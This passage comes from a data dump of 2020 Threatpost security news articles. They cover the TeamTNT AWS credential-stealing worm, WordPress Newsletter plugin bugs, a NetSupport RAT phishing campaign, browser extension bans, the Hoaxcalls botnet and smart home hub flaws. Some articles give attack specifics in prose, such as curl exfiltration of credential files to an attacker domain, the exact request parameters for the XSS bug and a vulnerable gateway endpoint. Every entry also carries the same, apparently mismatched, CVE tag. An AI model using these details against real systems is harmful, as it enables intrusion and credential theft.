said. \u201cDespite previous in-the-wild attacks, peripheral manufacturers have been slow to adopt the practice of signing firmware, leaving millions of Windows and Linux systems at risk of firmware attacks that can exfiltrate data, disrupt operations and deliver ransomware.\u201d\n\n**_Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us _**[**_Wednesday, Feb. 19 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)**_ when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives._**\n", "cvss3": {}, "published": "2020-02-18T11:00:08", "type": "threatpost", "title": "Lenovo, HP, Dell Peripherals Face Unpatched Firmware Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-02-18T11:00:08", "id": "THREATPOST:815A85AC4471792F2F220EAD5DD49460", "href": "https://threatpost.com/lenovo-hp-dell-peripherals-unpatched-firmware/152936/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:12", "description": "A cryptomining worm from the group known as TeamTNT is spreading through the Amazon Web Services (AWS) cloud and collecting credentials. Once the logins are harvested, the malware logs in and deploys the XMRig mining tool to mine Monero cryptocurrency.\n\nAccording to researchers at Cado Security, the worm also deploys a number of openly available malware and offensive security tools, including \u201cpunk.py,\u201d a SSH post-exploitation tool; a log cleaning tool; the Diamorphine rootkit; and the Tsunami IRC backdoor.\n\nIt is, they said, the first threat observed in the wild that specifically targets AWS for cryptojacking purposes. However, it also carries out more familiar fare.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe worm also steals local credentials, and scans the internet for misconfigured Docker platforms,\u201d according to a [Monday posting](<https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/>). \u201cWe have seen the attackers\u2026compromise a number of Docker and Kubernetes systems.\u201d\n\nAs more businesses embrace cloud and container environments, it has opened up a new attack surface for cybercriminals via misconfiguration. That said, cryptomining threats taking aim at Docker and Kubernetes aren\u2019t new. Attackers continue to scan for [publicly accessible, open Docker/Kubernetes servers](<https://threatpost.com/docker-registries-malware-data-theft/152734/>) in an automated fashion, and then exploit them in order to set up their own containers and execute malware on the victim\u2019s infrastructure.\n\nUsually that malware is a cryptominer of some kind, [as seen in April](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) in a Bitcoin-mining campaign using the Kinsing malware. Sometimes the threat is more evolved, as seen in July, when a fresh [Linux backdoor called Doki](<https://threatpost.com/icedid-trojan-rebooted-evasive-tactics/158425/>) was seen infesting Docker servers to sett the scene for any number of malware-based attacks, from denial-of-service/sabotage to information exfiltration to ransomware.\n\nHowever, the focus on AWS in this latest set of campaigns \u2013 which [were also flagged](<https://twitter.com/malwrhunterteam/status/1256664761997148161>) by MalwareHunterTeam \u2013 is unique, Cado researchers said.\n\n## **Attacking AWS**\n\nThe attack starts with targeting the way that AWS stores credentials in an unencrypted file at ~/.aws/credentials, and additional configuration details in a file at ~/.aws/config.\n\n\u201cThe code to steal AWS credentials is relatively straightforward \u2013 on execution it uploads the default AWS credentials and config files to the attackers\u2019 server, sayhi.bplace[.]net,\u201d researchers explained. \u201cCurl is used to send the AWS credentials to TeamTNT\u2019s server.\u201d\n\nInterestingly, though the script is written to be a worm, the automated portion of the attack didn\u2019t seem to be in full operation during the security firm\u2019s analysis.\n\n\u201cWe sent credentials created by CanaryTokens.org to TeamTNT, however have not seen them in use yet,\u201d according to the post. \u201cThis indicates that TeamTNT either manually assess and use the credentials, or any automation they may have created isn\u2019t currently functioning.\u201d\n\nThe script that anchors TeamTNT\u2019s worm is repurposed code from the aforementioned Kinsing malware, researchers said, which was originally used to scan for misconfigured Docker APIs, then spin up Docker images and install itself. They added that copying code from other tools is common in this area of cybercrime.\n\n\u201cIn turn, it is likely we will see other worms start to copy the ability to steal AWS credentials files too,\u201d they said. \u201cWhilst these attacks aren\u2019t particularly sophisticated, the numerous groups out there deploying cryptojacking worms are successful at infecting large amounts of business systems.\u201d\n\n## **TeamTNT \u2013 It\u2019s Dynamite**\n\nAs far as attribution, TeamTNT announces itself in numerous references within the worm\u2019s code, according to researchers, plus the group uses a domain called teamtnt[.]red. That domain hosts malware, and the homepage is entitled \u201cTeamTNT RedTeamPentesting.\u201d\n\nTeamTNT has been prolific, and was spotted originally earlier in the year. In April, Trend Micro [observed](<https://www.trendmicro.com/vinfo/hk-en/security/news/virtualization-and-cloud/coinminer-ddos-bot-attack-docker-daemon-ports>) the group attacking Docker containers.\n\nAn examination by Cado of one of the mining pools yielding information about the systems that the AWS-capable worm has compromised showed that for the one pool, there were 119 compromised systems, across AWS, Kubernetes clusters and Jenkins build servers.\n\n\u201cSo far we have seen two different Monero wallets associated with these latest attacks, which have earned TeamTNT about three XMR,\u201d researchers explained. \u201cThat equates to only about $300, however this is only one of their many campaigns.\u201d\n\nCado researchers suggested that to thwart such attacks, businesses should identify which systems are storing AWS credential files and delete them if they aren\u2019t needed. Also, review network traffic for any connections to mining pools or those sending the AWS credentials file over HTTP; and, use firewall rules to limit any access to Docker APIs.\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-18T14:14:12", "type": "threatpost", "title": "AWS Cryptojacking Worm Spreads Through the Cloud", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-18T14:14:12", "id": "THREATPOST:0A238D67F7286BA41103801846210F7A", "href": "https://threatpost.com/aws-cryptojacking-worm-cloud/158427/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:46", "description": "Newsletter, a WordPress plugin with more than 300,000 installations, has a pair of vulnerabilities that could lead to code-execution and even site takeover.\n\nThe Newsletter plugin offers site admins a visual editor that can be used to create newsletters and email campaigns from within WordPress. According to Wordfence, the issues are a reflected cross-site scripting (XSS) vulnerability and a PHP object-injection vulnerability, both of which can be rectified by updating to the latest version of Newsletter, v.6.8.2.\n\nThe first bug is an authenticated reflected XSS problem (CVE pending), which is a medium-severity issue ranking 6.5 on the CvSS scale. Successful exploitation could allow logged-in attackers to inject malicious code into a web window.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cDespite the fact that [this type of bug] requires an attacker to trick a victim into performing a specific action (such as clicking a specially crafted link), they can still be used to inject backdoors or add malicious administrative users,\u201d according to Wordfence. \u201cIf an attacker tricked a victim into sending a request containing a malicious JavaScript using either of these methods, the malicious JavaScript would be decoded and executed in the victim\u2019s browser.\u201d\n\nAccording to Wordfence, the specific issue arises because vulnerable versions of Newsletter use an AJAX function, tnpc_render_callback, to display edited blocks based on a set of options sent in the AJAX request. However these options aren\u2019t filtered, but are instead passed directly on to a second function, restore_options_from_request, which displays the blocks using the render_block function, according to [the analysis](<https://www.wordfence.com/blog/2020/08/newsletter-plugin-vulnerabilities-affect-over-300000-sites/>), released Monday.\n\n\u201cAs such, it was possible for an attacker to get malicious JavaScript to display in multiple ways,\u201d researchers explained in the post.\n\nFor instance, one method of exploitation would be to send a POST request to wp-admin/admin-ajax.php with the action parameter set to tnpc_render, the b parameter set to html and the options parameter set to arbitrary JavaScript, according to Wordfence. Or, the options parameter could be set to an empty array options[]=, and the encoded_options parameter set to a base64-encoded JSON string containing arbitrary JavaScript. In both cases, JavaScript would be rendered in a logged-in user\u2019s browser.\n\nThe second bug (the CVE is also pending on this one) is a high-severity PHP object-injection bug, carrying a severity ranking of 7.5 on the CvSS scale. The vulnerability could be used to inject a PHP object that in turn could be processed by code from another plugin or theme, and used to execute arbitrary code, upload files or \u201cany number of other tactics that could lead to site takeover,\u201d the firm warned.\n\n\u201cAlthough the Newsletter editor did not allow lower-level users to save changes to a given newsletter, the same tnpc_render_callback AJAX function was still accessible to all logged-in users, including subscribers,\u201d according to Wordfence. \u201cThis introduced a PHP object-injection vulnerability via the restore_options_from_request function.\u201d\n\nIn terms of methods of exploitation, Wordfence researchers explained that the __destruct function is used by many sites to automatically delete files and \u201cclean up\u201d once a pre-defined, legitimate process is completed. An example would be a script on an e-commerce site that calculates product prices, stores a log of that action, and then deletes the log when it\u2019s done.\n\nIf this code were running on a site that also contained the PHP object injection vulnerability, an attacker could delete the wp-config.php file containing the WordPress site\u2019s core configuration settings by sending a specially crafted payload.\n\n\u201cThe deletion of the wp-config.php file would reset the site and allow an attacker to take over by pointing the site\u2019s new configuration to a remote database under their control,\u201d explained Wordfence.\n\nThe researchers added that to be successful, an attacker would need to know which plugins are installed on a given site \u2013 which can be uncovered with scanning tools, but which means that the bug would be unlikely to be exploited by an automatic script or in bulk.\n\n## **WordPress Plugin Bugs Proliferate**\n\nWordPress plugins are no strangers to security vulnerabilities, some of which can be critical. For instance, last week [just such a bug was found](<https://threatpost.com/critical-rce-flaw-wordpress-plugin-on-70k-sites/157824/>) in a WordPress plugin called Comments \u2013 wpDiscuz, which is installed on more than 70,000 websites. The flaw gives unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.\n\nEarlier in July, [it was discovered that the](<https://threatpost.com/advertising-plugin-wordpress-full-site-takeovers/157283/>) Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.\n\nIn May, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that\u2019s used to build websites via a drag-and-drop function, [was found to harbor](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) two flaws that could allow full site takeover.\n\nMeanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a [CSRF bug in Real-Time Search and Replace](<https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>).\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-04T18:11:18", "type": "threatpost", "title": "Newsletter WordPress Plugin Opens Door to Site Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-04T18:11:18", "id": "THREATPOST:158524EA6F79769C547CC6A407EF6E78", "href": "https://threatpost.com/newsletter-wordpress-plugin-site-takeover/158025/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:28:08", "description": "The legitimate remote access tool (RAT) called NetSupport Manager, used for troubleshooting and tech support, is being converted into a malicious weapon by cybercriminals. Researchers at Palo Alto Networks\u2019 Unit 42 division have spotted a spam campaign attempting to deliver a malicious Microsoft Word document that uses the disguise of a NortonLifeLock-protected file.\n\nNortonLifeLock is a security utility for password-protecting attachments, among other things. If a recipient opens the document via Microsoft Office Outlook, a prompt appears that asks users to \u201cenable content\u201d to open the document \u2013 clicking \u201cyes\u201d executes macros.\n\n\u201cTo the user, the document appears to contain personal information that requires a password to view,\u201d said researchers, in a [recent analysis](<https://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/>). \u201cOnce the document is opened and the user clicks \u2018Enable Content,\u2019 the macro is executed and the user is presented with a password dialog box.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nResearchers added that the password is likely provided in the body of the phishing email, because it has to be correct; no malicious activity occurs until the correct key is entered. Once the key is accepted, the macros create and execute a batch file called alpaca.bat.\n\n\u201cThe macro obfuscates all strings using multiple labels on Visual Basic for Applications (VBA) forms, which contain two characters that are eventually linked together to construct the final command to download and execute the RAT on the victim,\u201d according to Unit 42. \u201cThe command string is executed via the VBA shell function, which [creates and executes alpaca.bat].\u201d\n\nThe campaign uses a range of tactics to obfuscate its activity from both dynamic and static analysis, according to researchers. For instance, the batch script uses msiexec, which is a legitimate part of the Windows Installer service. It\u2019s used to download and install a Microsoft Intermediate Language (MSIL) binary from a legitimate domain, which has been compromised. Once downloaded, the binary will execute using the /q parameter to suppress any Windows dialogs from the user.\n\nThe campaign also uses the PowerShell PowerSploit framework to carry out the installation of the malicious file activity. The MSI installs a PowerShell script in the victim\u2019s %temp% directory named REgistryMPZMZQYVXO.ps1. This contains another PowerShell script that is responsible for installing the NetSupport Manager RAT onto the victim\u2019s machine.\n\n\u201cThe PowerShell script appears to have been generated using the open-source script Out-EncryptedScript.ps1 from the PowerSploit framework,\u201d according to the analysis. \u201cIt contains a blob of data that is obfuscated via base64 and is TripleDES encrypted with a cipher mode of Cipher Block Chain (CBC).\u201d\n\nThe RAT installer PowerShell script interestingly aborts installation if Avast or AVG Antivirus Software is running on the target machine. If not, it installs 12 files that make up the NetSupport Manager RAT to a random directory and sets up persistence by creating the following registry key: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.\n\n\u201cOnce the main NetSupport Manager executable (presentationhost.exe) is started, it beacons to the domain geo.netsupportsoftware[.]com to retrieve geolocation of the host followed by an HTTP POST,\u201d the researchers wrote.\n\nResearchers said that the campaign is likely part of a larger offensive that dates back to early November, with email subject lines reusing themes associated with refunds, as well as transaction and order inquiries. The attached documents contain the target company\u2019s name.\n\n\u201cMalicious use of the NetSupport Manager remote access tool has also been reported by both [FireEye ](<https://www.fireeye.com/blog/threat-research/2018/04/fake-software-update-abuses-netsupport-remote-access-tool.html>)and [Zscaler ](<https://www.zscaler.com/blogs/research/netsupport-rat-installed-fake-update-notices>)researchers,\u201d researchers concluded. \u201cWhile this activity appears to be broad and at large scale, there are indications, such as the document name, that show the actor\u2019s attempt to provide a stronger relationship to the target in an attempt to increase the success rate.\u201d\n", "cvss3": {}, "published": "2020-03-02T21:59:34", "type": "threatpost", "title": "NetSupport Manager RAT Spread via Bogus NortonLifeLock Docs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-03-02T21:59:34", "id": "THREATPOST:EBE40A69B865E25E52FF87060EDD790F", "href": "https://threatpost.com/netsupport-manager-rat-nortonlifelock-docs/153387/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:25:35", "description": "UPDATE\n\nBoth the Google Chrome and Mozilla Firefox teams are cracking down on web browser extensions that steal user data and execute remote code, among other bad actions.\n\nBrowser extensions are add-ons that users can install to enhance their web surfing experience \u2013 they offer the ability to do everything from setting a special search wallpaper to displaying continuous weather data to language translation. This group also includes things such as ad blockers and security scanning.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nWhile extensions are useful, they can also introduce danger. In addition to [intentionally malicious](<https://threatpost.com/malicious-browser-add-guides-victims-phishing-sites-112912/77262/>) browser extensions that compromise users, legitimate offerings are also common targets for cybercriminals who [look to exploit vulnerabilities](<https://threatpost.com/cisco-webex-browser-bug/143285/>) in their code.\n\n## Google Bans Paid Extensions\n\nIn this case, Google said that after becoming aware of a widespread pattern of pernicious behavior on the part of a large number of Chrome extensions, it has disabled extensions that contain a monetary component \u2013 those that are paid for, offer in-browser transactions and those that offer subscription services. It\u2019s a temporary measure, according to the internet giant \u2013 but one that doesn\u2019t yet have a timeline for resolution.\n\n\u201cEarlier this month the Chrome Web Store team detected a significant increase in the number of fraudulent transactions involving paid Chrome extensions that aim to exploit users,\u201d it [said in a notice](<https://groups.google.com/a/chromium.org/forum/#!topic/chromium-extensions/EW0VuDjZSO4>), issued Friday. \u201cDue to the scale of this abuse, we have temporarily disabled publishing paid items. This is a temporary measure meant to stem this influx as we look for long-term solutions to address the broader pattern of abuse.\u201d\n\n[![Top 5 Paid Chrome Extensions \$All Now Banned\$](https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/27133106/google-paid-extensions-300x90.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/27133106/google-paid-extensions.png>)\n\nClick to Enlarge: Top 5 Paid Chrome Extensions\n\nThe notice added, \u201cWe are working to resolve this as quickly as possible, but we do not have a resolution timeline at the moment. Apologies for the inconvenience.\u201d\n\nRejections will carry a \u201cSpam and Placement in the Store\u201d tag, the Google team told developers. Rejections can be appealed and will be reviewed, it noted.\n\nThe impact could be minimal. According to [data from Extension Monitor](<https://extensionmonitor.com/blog/breaking-down-the-chrome-web-store-part-1>) published mid-2019, there are about 188,000 extensions in the Chrome Web Store, out of which only about 9 percent (16,718) fall into the paid category. Paid add-ons also account for less than 2.6 percent of the more than 1 billion total extension installs logged in the research. The top five paid extensions make up about half (48.5 percent) of that number, with IE Tab dominating at 4.1 million installs (31.5 percent). About 35 percent of paid extensions (5,885) don\u2019t have any users at all.\n\n_**Updated 9:30 a.m. ET on Jan. 28: Threatpost has reached out to Google for clarification on whether existing paid extensions have been taken down, or if the policy applies only to updates and new submissions.**_\n\n## Mozilla Cleans House\n\nMozilla meanwhile has taken a more case-by-case tack, disabling 197 Firefox add-ons in total for a range of improper activity, as first [reported by ZDnet](<https://www.zdnet.com/article/mozilla-has-banned-nearly-200-malicious-firefox-add-ons-over-the-last-two-weeks/>). This includes remote code-execution and harvesting user data. The add-ons have not only been removed from the official Mozilla Add-on (AMO) portal, but have been disabled in the browsers of existing installs.\n\nThe disabled apps include a whopping 129 extensions from 2Ring, which offers extensions and add-ons that provide business-to-business functionality for unified communications and contact centers. It\u2019s a Cisco Preferred Partner, and it [says on its website](<https://www.2ring.com/products/>) that it has \u201ca roadmap aligned with Cisco\u2019s collaboration portfolio and with solutions that their system engineers can deploy repeatedly and support with ease.\u201d\n\nThreatpost reached out to 2Ring for comment. Meanwhile, \u201cI\u2019ve reviewed the add-ons and confirmed they are executing remote code,\u201d according to the bug tracker on the issue.\n\nThat\u2019s not to say the extensions were intentionally malicious. Mozilla\u2019s policy is that extensions that dynamically fetch code from elsewhere, legitimate or otherwise, are in violation of its [content security policy](<https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Content_Security_Policy>).\n\nThe blocked extensions uncovered by ZDnet also include [six add-ons](<https://bugzilla.mozilla.org/show_bug.cgi?id=1609718>) deemed to be executing remote code, which were developed by Tamo Junto Caixa. [Tamo Junto](<https://aliancaempreendedora.org.br/tamojunto/faq/>) is a banking entity that offers Brazilian microentrepreneurs online courses, video classes, articles and management tools.\n\nOther browser extensions, like Rolimons Plus (an extension linked to the Roblox online multiplayer video game), [was blocked](<https://bugzilla.mozilla.org/show_bug.cgi?id=1608432>) for \u201ccollecting ancillary user data against our policies,\u201d while others (unnamed in the bug ticket) [were banned](<https://bugzilla.mozilla.org/show_bug.cgi?id=1610462>) for \u201cshowing malicious behavior on third-party websites.\u201d Still others, including [three unnamed add-ons](<https://bugzilla.mozilla.org/show_bug.cgi?id=1610456>), were determined to be \u201cfake premium products.\u201d\n\nAs with Google Chrome, Mozilla developers are able to appeal the bans.\n\nAt least one researcher said that the actions are likely the fruit of heightened concerns and regulations around privacy, including the California Consumer Privacy Act (CCPA).\n\n\u201cIn the [post-CCPA/GDPR world](<https://threatpost.com/californias-tough-new-privacy-law-and-its-biggest-challenges/151682/>), tech companies are paying greater attention to the risks that software poses to users,\u201d said Mike Bittner, associate director of Digital Security and Operations for The Media Trust, via email. \u201cMuch of the risks stem from having no control over what impact code will have on the security and privacy of user personal data. Until tech companies know who\u2019s running what code in the various components that make up extensions and other forms of software, the risk of fraud and theft will remain high, as will the risk of running afoul of these new privacy laws.\u201d\n", "cvss3": {}, "published": "2020-01-27T21:26:55", "type": "threatpost", "title": "Google, Mozilla Ban Hundreds of Browser Extensions in Chrome, Firefox", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-01-27T21:26:55", "id": "THREATPOST:6F4D076CD2B99D42353A5547FDBB288C", "href": "https://threatpost.com/google-mozilla-ban-browser-extensions-chrome-firefox/152257/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:25:06", "description": "Cyberattackers are targeting a post-authentication remote code-execution vulnerability in Symantec Secure Web Gateways as part of new Mirai and Hoaxcalls botnet attacks.\n\nHoaxcalls first emerged in late March, as a variant of the Gafgyt/Bashlite family; it\u2019s named after the domain used to host its malware, Hoaxcalls.pw. Two new Hoaxcalls samples [showed up on the scene](<https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/>) in April, incorporating new commands from its command-and-control (C2) server. These included the ability to proxy traffic, download updates, maintain persistence across device restarts, prevent reboots and launch a larger number of distributed denial-of-service (DDoS) attacks.\n\nIt also incorporated a new exploit for infiltrating devices \u2013 an [unpatched vulnerability](<https://threatpost.com/flaws-zyxels-network-management-software/153554/>) impacting the ZyXEL Cloud CNM SecuManager that was disclosed in March. Now, researchers at Palo Alto Networks\u2019 Unit 42 division have observed that same version of the botnet exploiting a second unpatched bug, this time in Symantec Secure Web Gateway version 5.0.2.8, which is a product that became end-of-life (EOL) in 2015 and end-of-support-life (EOSL) in 2019.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe Symantec bug was [disclosed in March](<https://code610.blogspot.com/2020/03/postauth-rce-in-symantec-web-gateway.html>). Since it affects older versions of the gateway, it will remain unpatched.\n\n\u201cOn April 24, I observed samples of the same botnet incorporating an exploit targeting the EOL\u2019d Symantec Secure Web Gateway v5.0.2.8, with an HTTP request in the format: POST /spywall/timeConfig.php HTTP/1.1,\u201d said Unit 42 researcher Ruchna Nigam, in a [Thursday post](<https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/>). \u201cSome samples reach out to a URL for a public file upload service (plexle[.]us) where the post-exploitation payload is hosted. The URL contacted for the update serves a shell script that downloads and executes binaries from attacker-controlled URLs.\u201d\n\nMeanwhile, Nigam also saw a [Mirai variant](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>) campaign in May spreading using that same vulnerability; oddly, the malware itself lacks any DDoS capabilities, according to the researcher. As such, the binary seems to be a first-stage loader.\n\n\u201cSamples of this campaign surfaced early May, built on the Mirai source code, and are packed with a modified version of UPX by using a different 4-byte key with the UPX algorithm,\u201d according to Nigam. \u201cAnother deviation from the Mirai source-code is the use of all of ten 8-byte keys that are cumulatively used for a byte-wise string encryption scheme.\u201d\n\nThe vulnerability as mentioned is a post-authentication bug, meaning that the exploit is only effective for authenticated sessions. It\u2019s also no longer present in the latest version of the Symantec Web Gateway, version 5.2.8, so updated devices are protected.\n\nResearchers at Radware previously noted that Hoaxcalls operators seem very quick to weaponize newly discovered bugs, like the ZyXel vulnerability. Unit 42\u2019s Nigam came to a similar conclusion:\n\n\u201cThe use of the exploit in the wild surfaced only a few days after the publication of the vulnerability details, highlighting the fact that the authors of this particular botnet have been pretty active in testing the effectiveness of new exploits as and when they are made public,\u201d according to the researcher.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On [June 3 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>), join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, [Taming the Unmanaged and IoT Device Tsunami](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>). Get exclusive insights on how to manage this new and growing attack surface. [Please register here](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>) for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-15T20:41:24", "type": "threatpost", "title": "Hoaxcalls Botnet Exploits Symantec Secure Web Gateways", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-05-15T20:41:24", "id": "THREATPOST:6A1329627DFBA3501BA187A580E968D5", "href": "https://threatpost.com/hoaxcalls-botnet-symantec-secure-web-gateways/155806/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:19", "description": "Three different connected home hubs \u2013 Fibaro Home Center Lite, Homematic Central Control Unit (CCU2) and Elko\u2019s eLAN-RF-003 \u2013 are vulnerable in their older versions to serious bugs that would allow information disclosure, man-in-the-middle (MiTM) attacks and unauthenticated remote code execution (RCE), according to researchers.\n\nHome hubs are used to connect a range of smart devices (including appliances, IP cameras, smart thermostat and doorbell gadgets, connected TVs, Google Home and Amazon Alexa offerings, plus laptops, phones and the like). Researchers at ESET pointed out in [Tuesday research](<https://www.welivesecurity.com/2020/04/22/serious-flaws-smart-home-hubs-is-your-device-among-them/>) that an attacker that compromises one of these could in theory gain full access to all of the peripheral devices connected to it \u2013 a scenario that could also impact businesses given that more people are working from home.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16215737/Divycloud_225x188.jpg)](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)\n\nThe flaws were disclosed by ESET just this week, though most of them were fixed in previous updates. They still impact a number of IoT devices, the analyst firm said \u2013 likely because consumers don\u2019t tend to update their device firmware very often, if at all; and, a handful of the flaws remain unaddressed.\n\n**Fibaro Home Center Lite**\n\nFibaro Home Center Lite (firmware version 4.170) was found by the ESET IoT research team to be vulnerable to a range of bugs. The problems included TLS connections that were vulnerable to MitM attacks thanks to a missing certificate validation \u2013 which would open the door to command injection; the use of very short, hardcoded password stored in the file /etc/shadow in the device\u2019s firmware, ripe for brute-forcing; the use of a hardcoded password salt; and a vulnerable weather service API that leaked the exact GPS coordinates of the device due to the use of unencrypted HTTP communications.\n\nSome of these could be chained together to create an SSH backdoor for full control of a targeted device.\n\nFor instance, ESET researchers were able to create their own MiTM server, thanks to the fact that the Fibaro Home Center Lite communicates with its cloud server via a standard SSH tunnel, but it fails to validate the certificate for TLS communications with the server.\n\n\u201cFibaro Home Center Lite sends two separate TLS-encrypted requests asking for the SSH server\u2019s hostname and listening port,\u201d the researchers explained. \u201cBased on the information returned, Fibaro Home Center Lite creates a secured connection via an SSH tunnel to the specified SSH server.\u201d\n\nBecause of the failure to perform certificate verification on the TLS requests, any attacker can use fake certificates signed by their proxy server to accept the public key of the targeted device and mimic the original Fibaro server.\n\n\u201cTo make matters worse, intercepted TLS requests \u2013 intended to create the SSH tunnel between the device and the legitimate server \u2013 are vulnerable to command injection,\u201d according to the research. \u201cBy using the MitM server, attackers can replace the address of the original server lb-1.eu.ra.fibaro.com with whatever they wish.\u201d\n\nFor example, the attacker can generate a malicious response with a command injection that causes the device\u2019s initialization shell script to fail. That prompts the device to request the server\u2019s IP address once again \u2013 a request that can now be intercepted by the attacker and replaced with a different tunnel.\n\n\u201cAnother tunnel is created, through which the attacker\u2019s SSH backdoor port is forwarded,\u201d according to the analysis. \u201cThis reroutes the communication from both ports (SSH 666, HTTP 80) to the attacker\u2019s MitM server. From this point on, the attacker has root access to Fibaro Home Center Lite.\u201d\n\nFrom there, attackers can intercept firmware updates and uncover the hardcoded root password, valid for all Fibaro Home Center Lite devices \u2013 can be \u201ctrivially brute-forced,\u201d according to the security firm.\n\nAttackers can also manipulate user credentials for the device\u2019s web interface, stored in an SQLite database on Fibaro Home Center Lite.\n\n\u201cThese passwords are stored SHA-1 hashed, created from the supplied password salted with a hardcoded string that can easily be extracted from a script in the firmware image file,\u201d the analysis detailed. \u201cUsing the salt, an attacker can rewrite existing credentials in the appropriate row of the Home Center Lite\u2019s SQLite database located at /mnt/user_data/db, rendering the legitimate password invalid.\u201d\n\nFibaro issued patches for the issues, so that the home hubs now verify server certificates and disallow command injections; and the hardcoded root password has been replaced with a \u201clonger and more secure alternative,\u201d according to ESET.\n\nThe hardcoded salt string used to create the SHA-1 hash of the password is however a lingering issue.\n\n**Homematic Central Control Unit (CCU2)**\n\nThe Homematic CCU2 (firmware version 2.31.25) harbors a bug that would allow unauthenticated remote code execution (RCE) as a root user.\n\nThe issue arises from a common gateway interface (CGI) script that handles the logout procedure of the Homematic CCU2\u2019s web-based administration interface.\n\n\u201cThe $sid (session ID) parameter was not properly escaped, enabling an attacker to inject malicious code and run arbitrary shell commands as the root (administrator) user,\u201d according to the research. \u201cAs the logout script did not check that it is processing a request from a currently logged-in session, an unlimited number of these requests could be made by an attacker without ever having to log into the device.\u201d\n\nUsing this, an attacker could set a new root password.\n\nThe issue has been patched.\n\n**Elko\u2019s eLAN-RF-003**\n\nThe eLAN-RF-003 (firmware version 2.9.079) is a smart RF box that allows user to control a variety of systems such as 